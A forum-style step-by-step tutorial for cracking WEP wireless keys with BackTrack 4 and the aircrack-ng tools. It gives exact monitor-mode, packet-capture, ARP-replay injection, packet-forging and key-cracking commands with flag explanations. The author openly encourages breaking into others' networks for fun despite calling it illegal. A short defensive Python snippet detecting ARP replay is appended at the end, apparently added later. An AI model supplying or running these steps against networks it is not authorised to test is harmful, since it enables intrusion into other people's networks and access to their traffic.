This topic is for those who want to know how to crack a WEP key. (Please note: Cracking others' wireless networks and using them for your own fun is illegal, and can be bad. But damn is it fun)
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Note: This might not work for you. There are a few reasons why, but the main reason normally is that your wireless card is not supported in Linux. Please do not come crying to me if it does not work and you did all this work.
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
OK, first off you will need a wonderful Linux distro. I recommend BackTrack 4:
http://www.remote-exploit.org/backtrack_download.html
This baby works wonders and is an awesome Slackware distro that has everything you could need for doing the bad deeds.
You can just burn this .iso to a DVD or install it to a thumb drive
(a USB drive, memory stick, whatever you call it; I call it a thumb drive).
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
I will explain how to install it to a thumb drive. What you need is:
1) =bt4-pre-final.iso=
2) =UNetbootin=
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Step 1
OK, once you have these files, what you are going to do is:
1) Open UNetbootin
2) Load the .iso into the application: click on the disk image button (see the pic provided)
[imgw]http://i32.tinypic.com/15hlkp5.png[/imgw]
3) Make sure to select the right drive
[imgw]http://i26.tinypic.com/8x7ksy.png[/imgw]
4) Once you have selected the right drive from the list, click OK
5) This might take a few minutes; just wait, it will tell you when it is done.
6) You are done
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Now you have your DVD or your thumb drive, and you are ready to boot up BackTrack.
If you have the DVD, just put it into the drive and make sure to boot from it. If you are using the USB thumb drive, just make sure you can boot from it.
Once BackTrack 4 boots up (I might be missing a step here, but I will fill it in once I get it downloaded again; I think it just boots right in, I do not remember sadly)
Once the full screen is showing you your desktop, click on what is basically the start bar at the bottom left, and it should open up just like the start bar would normally open in Windows.
Once that is open, click on the terminal icon and follow these wonderful instructions.
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
1. Type in “airmon-ng” to see the wireless adaptors on your computer.
2. You should see a listing come up. Mine showed wlan0. Yours may be different, such as rausb0.
Type in “airmon-ng start wlan0” to start your wireless device. Replace the “wlan0” with whatever yours showed to be. This will create a new “virtual” device, and will show the name. The name for mine was “mon0”.
3. Open a new terminal window, and type “airodump-ng mon0”, again replacing “mon0” with your new virtual device’s name.
----You will begin to see a listing of different APs (access points). Find the one you want and press Control C. Pressing Control C will cancel the current program running in the terminal. The names of the networks found are under the ESSID column. You may not see anything there, which is fine; some of them are invisible. FUSiON is the name of my network, so I went over to the BSSID column, and copied the address, which was 00:23:69:18:E4:7D. This address is important, so I would recommend copying it, or writing it down. Also take note of what channel it is on.
4. This is what I typed after that: “airodump-ng --bssid 00:23:69:18:E4:7D --channel 6 --ivs -w FUSiON mon0”. This is all real easy stuff, so I’ll just explain it to you right quick. airodump-ng is the program that captures what are called IVs, the primary component in cracking WEP networks. Here goes!
¤¤¤¤¤¤¤¤¤¤¤ Type “airodump-ng”
¤¤¤¤¤¤¤¤¤¤¤ Add a space and type “--bssid 00:23:69:18:E4:7D”, replacing the address with the address of your network. This “flag” says we only want to see this address, and nothing else.
¤¤¤¤¤¤¤¤¤¤¤ Add a space and type “--channel 6”, replacing the number 6 with the number of the channel of your network (although 6 is VERY common, so don’t be surprised if that is it).
¤¤¤¤¤¤¤¤¤¤¤ Add a space and type “--ivs”. This command only captures IVs, which will make cracking the password faster.
¤¤¤¤¤¤¤¤¤¤¤ Add a space and type “-w FUSiON”, replacing FUSiON with the name of your network, or something that you will remember, as we will be cracking this file later to find the password. I just use the name of the network, because it helps me remember easier.
¤¤¤¤¤¤¤¤¤¤¤ The “mon0” at the end simply defines which device to use.
5. Open a new terminal window. In it, type “aireplay-ng -5 -b 00:23:69:18:E4:7D mon0”
¤¤¤¤¤¤¤¤¤¤¤ aireplay-ng is a tool that greatly helps generate IVs. Without it, it wouldn’t be possible to crack most WEP networks.
¤¤¤¤¤¤¤¤¤¤¤ The “-5” flag is one method, and the most common, that is used to generate the IVs.
¤¤¤¤¤¤¤¤¤¤¤ The “-b 00:23:69:18:E4:7D” tells which address to attack. The -b stands for bssid, which is the address of your network. So you will have to replace 00:23:69:18:E4:7D with the address of your network (the one that I recommended you write down or copy earlier).
¤¤¤¤¤¤¤¤¤¤¤ The “mon0” at the end, again, just defines which device to use.
6. Wait, and press “Y” for yes when it asks if you would like to use the selected frame.
7. This process may have to be repeated until you have a resulting fragment file. It will say when you do. Additionally, you can run this command, “aireplay-ng -1 1 -a 00:23:69:18:E4:7D mon0”, to help with getting a fragment file. Again, make sure to replace my address with your own.
8. Now we must build a file that will be used to gather those precious IVs! I did it with the following command:
“packetforge-ng -0 -a 00:23:69:18:E4:7D -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0324-230256.xor -w arpy”
Let me break this down for you.
¤¤¤¤¤¤¤¤¤¤¤ packetforge-ng is the program which will build the arp file, as I like to call it, which you will soon see.
¤¤¤¤¤¤¤¤¤¤¤ Add a space, and follow it with “-0 -a 00:23:69:18:E4:7D” and, of course, replace it with your own network address.
¤¤¤¤¤¤¤¤¤¤¤ Add a space, and type in “-h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255”. This part of the command is pretty universal; rarely is it changed. So we won’t go into detail on it here.
¤¤¤¤¤¤¤¤¤¤¤ Add a space, and type in “-y fragment-XXXX-XXXXXX.xor”, putting your own fragment file name in place of this one, as well.
¤¤¤¤¤¤¤¤¤¤¤ And lastly, type in “-w arpy”. Just the -w is important. The arpy can be anything you can remember. It’s something I’ve just always used, cuz it’s easy for me to remember.
¤¤¤¤¤¤¤¤¤¤¤ If all goes well, it successfully builds our ARP packet.
9. Almost done! “aireplay-ng -3 -r arpy -b 00:23:69:18:E4:7D mon0” is our next command.
¤¤¤¤¤¤¤¤¤¤¤ aireplay-ng, like before, should get those IVs flowing in. On average, I see about 500 IVs/second, which isn’t too bad. But some cards do better than others, so you may have better, or worse, luck.
¤¤¤¤¤¤¤¤¤¤¤ -r arpy is a flag that tells aireplay-ng to play the arp file we created called arpy.
¤¤¤¤¤¤¤¤¤¤¤ Like before, -b 00:23:69:18:E4:7D specifies which address to attack, and mon0 says which wireless interface to use.
10. If all went well, we are gathering IVs! Open the airodump-ng terminal window that we’ve had open, and look at the Data column. It should be constantly rising. This is the longest process, as we have to wait. While others recommend getting at least 100,000 IVs, I’ve never waited that long. I’ve cracked many WEPs at just 20,000, although I recommend cracking at 40,000 IVs. So go get a Dr. Pepper and wait a while until you have enough accumulated.
11. Once you have at least 40,000, we can start cracking the WEP password!
¤¤¤¤¤¤¤¤¤¤¤ This step has to be the simplest.
¤¤¤¤¤¤¤¤¤¤¤ Open a new Terminal window, and type “aircrack-ng XXXX-01.ivs” replacing the XXXX with what you used when you first started the airodump-ng command.
¤¤¤¤¤¤¤¤¤¤¤ Depending on the speed of your computer, you will soon have the WEP Key Decrypted. Just make sure to remove the colons “:” before confirming the Key.
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
If you work better with visual help, then check out these videos:
[ame="http://www.youtube.com/watch?v=qe1VuhGciSI&feature=player_embedded"]YouTube - WEP Cracking with Captions and Voice, using Backtrack 4 - Part 1 of 2[/ame] Part1
[ame="http://www.youtube.com/watch?v=7fI7qs9ZF40&feature=player_embedded"]YouTube - WEP Cracking with Captions and Voice, using Backtrack 4 - Part 2 of 2[/ame] part2
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
-This wonderful walkthrough is from Josh Houston; I do not want to take credit for this part-
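
From the defender's side, the ARP replay in step 9 is noisy: one encrypted frame is retransmitted hundreds of times per second, so its IV and length repeat. The Python sketch below is an added example, not part of the original walkthrough; the record format (timestamp, source MAC, IV, length), the thresholds and the capture data are assumptions constructed for illustration, with the injector's MAC taken from the -h value in step 8.

```python
from collections import Counter, defaultdict

def find_replay_sources(frames, min_rate=100, min_repeat=0.9):
    """Return {src_mac: [second, ...]} for each second in which src_mac sent
    at least min_rate WEP data frames and at least min_repeat of them carried
    one identical (IV, length) pair, i.e. the same frame replayed."""
    buckets = defaultdict(Counter)   # (src, second) -> Counter of (iv, length)
    for ts, src, iv, length in frames:
        buckets[(src, int(ts))][(iv, length)] += 1
    flagged = defaultdict(list)
    for (src, second), seen in sorted(buckets.items()):
        total = sum(seen.values())
        top = seen.most_common(1)[0][1]   # count of the most repeated frame
        if total >= min_rate and top / total >= min_repeat:
            flagged[src].append(second)
    return dict(flagged)

def constructed_capture():
    """Constructed records (timestamp, source MAC, IV, length); not a real capture."""
    frames = []
    # Ordinary client: 20 frames/s for 3 s, a fresh IV and varying length per frame.
    for i in range(60):
        frames.append((i / 20, "02:00:00:00:00:01", f"{i:06x}", 80 + (i * 37) % 400))
    # Injector: 500 frames/s (the rate quoted in step 9) for 2 s, one frame replayed.
    for i in range(1000):
        frames.append((1 + i / 500, "00:11:22:33:44:55", "a1b2c3", 68))
    return frames

if __name__ == "__main__":
    for mac, seconds in find_replay_sources(constructed_capture()).items():
        print(f"possible ARP replay from {mac} during seconds {seconds}")
```

A legitimate station changes its IV on every frame, so the repeat ratio stays near zero even for a busy client; only verbatim retransmission trips both thresholds.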